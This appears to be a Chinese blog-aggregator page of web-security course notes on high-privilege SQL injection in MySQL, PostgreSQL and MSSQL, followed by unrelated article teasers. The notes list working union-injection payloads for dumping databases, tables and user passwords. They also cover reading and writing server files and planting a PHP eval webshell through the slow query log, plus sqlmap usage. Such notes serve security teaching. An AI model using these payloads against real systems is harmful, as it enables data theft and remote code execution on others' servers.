当前位置：首页 > news >正文

25、WEB攻防——通用漏洞SQL读写注入MYSQLMSSQLPostgreSQL

news 2026/5/13 8:05:58

文章目录

Mysql-root高权限读写注入
PostgreSQL——dba高权限读写注入
Mssql-sa高权限读写注入

Access无高权限注入点——只能猜解，而且是暴力猜解；
MYSQL，PostgreSQL，MSSQL(SQL server)高权限注入点——可升级读写（文件）、（命令）执行等。

所谓高权限注入点，指的就是在连接数据库时，所使用的用户（数据库连接用户）具有较高的权限。因为权限划分的缘故。
如果存在高权限注入点，所做的不仅仅是查看数据库的内容，还可以是文件上传、命令执行。

Mysql-root高权限读写注入

读文件（命令行）
数据库可以调用自身的函数load_file('<file_path>')读取服务器上的文件。payload：select load_file('<file_path>')
写文件（命令行）
有关函数：outfile()、dumpfile()。paylaod：select 'file_content' into outfile '<file_path>'
读文件：union select 1,load_file('d:/w.txt'),3 --+

在实战中，一般读取数据库配置文件、网站搭建性文件。具体读哪些文件，可以参考load_file 常用路径
- 获取网站路径方式1：读取中间件的配置文件，例如phpstudy的vhosts.conf文件
- 获取网站路径方式2：phpinfo()
- 获取网站路径方式3：报错
写文件：union select 1,'xxx',3 into outfile 'd:/www.txt' --+

会出现有高权限注入点，但是无法读取写入文件的情况——secure-file-priv参数
secure-file-priv参数有三种情况：

secure-file-priv=null，不允许读写；
secure-file-priv=/tmp/，读写只能发生在tmp目录下；
secure-file-priv= ，读写不做限制。

突破方法

注入点需要支持SQL执行环境，若没有就需要借助phpmyadmin或能够直接连上那个对方数据库进行绕过。payload:

set global slow_query_log=1; //启用慢日志
set global slow_query_log_file='shell网站路径';  //保存慢日志的路径，便于用浏览器可以进行访问
select '<?php @eval($_GET['cmd']);?>' or sleep(11);

支持堆叠注入

PostgreSQL——dba高权限读写注入

# 测列数
order by 4# 测回显位
and 1=2 union select 'null',null,null //没报就没有，换下一个
and 1=2 union select null,'null',null //爆出null# 获取信息
and 1=2 union select null,version(),null // 获取当前数据库版本
and 1=2 union select null,current_user,null //获取当前用户
and 1=2 union select null,current_database(),null //获取当前数据库名# 获取所有数据库名
and 1=2 union select null,string_agg(datname,','),null from pg_database# 获取表名
1. and 1=2 union select null,string_agg(tablename,','),null from pg_tables where schemaname='public'
2. and 1=2 union select null,string_agg(relname,','),null from pg_stat_user_tables# 获取字段名
and 1=2 union select null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'# 读取数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users-----
# 获取DBA用户（PostgreSQL中的root用户）
and 1=2 union select null,string_agg(username,','),null from pg_user where usesuper is true

参考postgresql注入

Mssql-sa高权限读写注入

# 测字段数
order by 4# 测回显位
and 1=2 union all select 'null',null,null //用单引号包裹null，若该位置存在回显位，则页面爆出null# 获取信息
@@version //获取版本信息
db_name() //当前数据库名字
user,system_user,current_user,user_name //获取当前用户名,四种查询方式
@@SERVERNAME //获取服务器主机信息
and 1=2 union all select null,db_name(),null# 查表名
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u'),null
and 1=2 union all select null,(select top 1 name from <数据库名>.dbo.sysobjects where xtype='u' and name not in ('manage'(第一个表名))),null //查其他表# 查字段名
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null# 查字段内容
and 1=2 union all select null,username,null from manage

使用sqlmap时，一般直接用sqlmap发数据包。讲数据包保存在txt文件中，在参数后面加*告诉sqlmap，你要在这进行注入。
在这里插入图片描述
payload：python sqlmap.py -r 1.txt

在这里插入图片描述
sql使用手册

25、WEB攻防——通用漏洞SQL读写注入MYSQLMSSQLPostgreSQL

文章目录 Mysql-root高权限读写注入PostgreSQL——dba高权限读写注入Mssql-sa高权限读写注入 Access无高权限注入点——只能猜解，而且是暴力猜解； MYSQL，PostgreSQL，MSSQL(SQL server)高权限注入点——可升级读写（文件…...

编程日记 2024/1/1 6:19:32

【第5期】前端Vue使用Proxy+Vuex(store、mutations、actions)跨域调通本地后端接口

本期简介本期要点本地开发前后端如何跨域调用全局请求、响应处理拦截器处理封装HTTP请求模块编写API请求映射到后端API数据的状态管理一、本地开发前后端如何跨域调用众所周知，只要前端和后端的域名或端口不一样，就存在跨域访问，例如&…...

编程日记 2024/1/1 6:18:31

在Visual Studio（VS）编译器中，Release和Debug区别

一、优化级别 1、Debug（调试） 在Debug模式下，编译器不会对代码进行优化，而是专注于生成易于调试的代码。这使得开发者可以在调试过程中更直观地跟踪变量的值和程序的执行流程。 2、Release（发布） 在Relea…...

编程日记 2024/1/1 6:17:30

子网划分问题(实战超详解)_主机分配地址

文章目录: 子网划分的核心思想第一步,考虑借几位作为子网号第二步,确定子网的网络地址第三步,明确网络地址,广播地址,可用IP地址范围一些可能出现的疑问实战题目一子网划分的核心思想网络号不变,借用主机号来产生新的网络划分前的网络:网络号主机号划分后的网络:原网…...

编程日记 2024/1/1 6:16:29

【QT】单例模式，Q_GLOBAL_STATIC 宏的使用和使用静态成员函数，eg：{简单的日志记录器}

简单的日志记录器为例。创建一个Logger类，该类负责记录应用程序的日志消息使用 Q_GLOBAL_STATIC 宏解析：Q_GLOBAL_STATIC 是一个 Qt 宏，用于创建全局静态实例。它确保在需要时只创建一次实例，而不管该实例是在哪个线程中创建…...

编程日记 2024/1/1 6:15:29

利用小红书笔记详情API：构建高效的内容创作与运营体系

随着社交媒体的兴起，小红书作为国内知名的内容分享平台，吸引了大量用户和内容创作者。为了更好地获取小红书上的优质内容，许多企业和开发者选择使用小红书笔记详情API。本文将探讨如何利用该API构建高效的内容创作与运营体系。一、小红书笔记…...

编程日记 2024/1/1 6:14:28

【K8S 二进制部署】部署单Master Kurbernetes集群

目录一、基本架构和系统初始化 1、集群架构： 2、操作系统初始化配置： 2.1、关闭防火墙和安全机制： 2.2、关闭swap 2.3、根据规划设置主机名 2.4、三台主机全部互相映射 2.5、调整内核参数 3、时间同步（所有节点时间必须同…...

编程日记 2024/1/1 6:13:25

vue中常见的指令

简单介绍一下常见的vue中用到的指令 v-on 指定当前的事件，语法糖为，如例子所示，指定按钮的事件为addCounter，点击会使变量counter 1 <!DOCTYPE html> <html><head><meta charset"utf-8" />…...

编程日记 2024/1/1 6:12:24

单片机原理及应用：开关控制LED多种点亮模式

从这篇文章开始，我们不再只研究单一的外设工作，而是将LED、数码管、开关、按键搭配在一起研究，这篇文章主要介绍LED和开关能擦出怎样的火花，同时也介绍一些函数封装的知识。由于开关有闭合与打开两种状态，LED有左移流…...

编程日记 2024/1/1 6:09:22

你真的了解UVM sequence的运行机制吗

1. 前言 UVM在sequence里提供了很多的callback方法给用户，从而更灵活地完成各种复杂场景的交互和控制执行顺序。我们可能在很多情况下只使用了body()方法，本文将介绍sequence里常见的callback方法，以及在不同场景下，它们的是否被…...

编程日记 2024/1/1 6:06:19

Bug升级记

2023.12.28 （1) 小程序session_key泄露隐患核心：session_key这个字段及对应值不应该传到小程序客户端等服务器外的环境错误操作：直接在小程序调用https://api.weixin.qq.com/sns/jscode2session并将session_key作为参数进行明文传输正确操…...

编程日记 2024/1/1 6:01:15

爬虫详细教程第1天

爬虫详细教程第一天 1.爬虫概述1.1什么是爬虫？1.2爬虫工具——Python1.3爬虫合法吗？1.4爬虫的矛与盾1.4.1反爬机制1.4.2反爬策略1.4.3robots.txt协议 2.爬虫使用的软件2.1使用的开发工具: 3.第一个爬虫4.web请求4.1讲解一下web请求的全部过程4.2页面渲染…...

编程日记 2024/1/1 6:00:14

[Linux] MySQL数据库的备份与恢复

一、数据库备份的分类和备份策略 1.1 数据库备份的分类 1）物理备份物理备份：对数据库操作系统的物理文件（如数据文件、日志文件等）的备份。物理备份方法： 冷备份(脱机备份) ：是在关闭数据库的时候进…...

编程日记 2024/1/1 5:58:12

Django3.0升级到4.1，Python3.8升级到3.11.6问题大汇总报错1：ERROR: Could not build wheels for cffi, uWSGI, which is required to install pyproject.toml-based projects ERROR: Could not build wheels for cffi, uWSGI, which is required to install pyproject.tom…...

编程日记 2024/1/1 5:51:07

2023-12-30 AIGC-LangChain介绍

摘要: 2023-12-30 AIGC-LangChain介绍 LangChain介绍 1. https://youtu.be/Ix9WIZpArm0?t353 2. https://www.freecodecamp.org/news/langchain-how-to-create-custom-knowledge-chatbots/ 3. https://www.pinecone.io/learn/langchain-conversational-memory/ 4. https://de…...

编程日记 2024/1/1 5:50:06

pytorch01：概念、张量操作、线性回归与逻辑回归

目录一、pytorch介绍1.1pytorch简介1.2发展历史1.3pytorch优点二、张量简介与创建2.1什么是张量？2.2Tensor与Variable2.3张量的创建2.3.1 直接创建torch.tensor()2.3.2 从numpy创建tensor 2.4根据数值创建2.4.1 torch.zeros()2.4.2 torch.zeros_like()2.4.3 torch…...

编程日记 2024/1/1 5:49:05

storyBook play学习

场景在官方给出的案例中， Page.stories.js import { within, userEvent } from storybook/testing-library import MyPage from ./Page.vueexport default {title: Example/Page,component: MyPage,parameters: {// More on how to position stories at: https:/…...

编程日记 2024/1/1 5:45:01

Android Matrix画布Canvas旋转Rotate，Kotlin

Android Matrix画布Canvas旋转Rotate，Kotlin private fun f1() {val originBmp BitmapFactory.decodeResource(resources, R.mipmap.pic).copy(Bitmap.Config.ARGB_8888, true)val newBmp Bitmap.createBitmap(originBmp.width, originBmp.height, Bitmap.Config.…...

编程日记 2024/1/1 5:44:00

私有部署ELK，搭建自己的日志中心（三）-- Logstash的安装与使用

一、部署ELK 上文把采集端filebeat如何使用介绍完，现在随着数据的链路，继续~~ 同样，使用docker-compose部署： version: "3" services:elasticsearch:container_name: elasticsearchimage: elastic/elasticsearch:7.9…...

编程日记 2024/1/1 5:41:58

2023就这样过去了，2024会更好吗？

2023年，不是很好 2023年是疫情后的第一年，疫情过去了，大家都有大多的希望，希望经济可以恢复，希望信心可以恢复，但是整体都是远远低于预期的。年初的一片热潮，年中的一片哀嚎，年底基…...

编程日记 2024/1/1 5:39:56

2026年主流地图API AI功能开发与零代码工具横评

核心观点摘要行业趋势判断：AI与零代码正深度融合地图API开发，推动位置智能从专业编码向业务自助快速演进，2026年主流平台将在多模态数据融合与行业化场景能力上形成分水岭。选型关键维度：需综合考量数据覆盖广度、模型智能水平、…...

编程新知 2026/5/13 6:43:12

泰拉瑞亚地图编辑器TEdit：5步打造专业级游戏世界的终极指南

泰拉瑞亚地图编辑器TEdit：5步打造专业级游戏世界的终极指南【免费下载链接】Terraria-Map-Editor TEdit - Terraria Map Editor - TEdit is a stand alone, open source map editor for Terraria. It lets you edit maps just like (almost) paint! It also lets y…...

编程新知 2026/5/13 5:16:48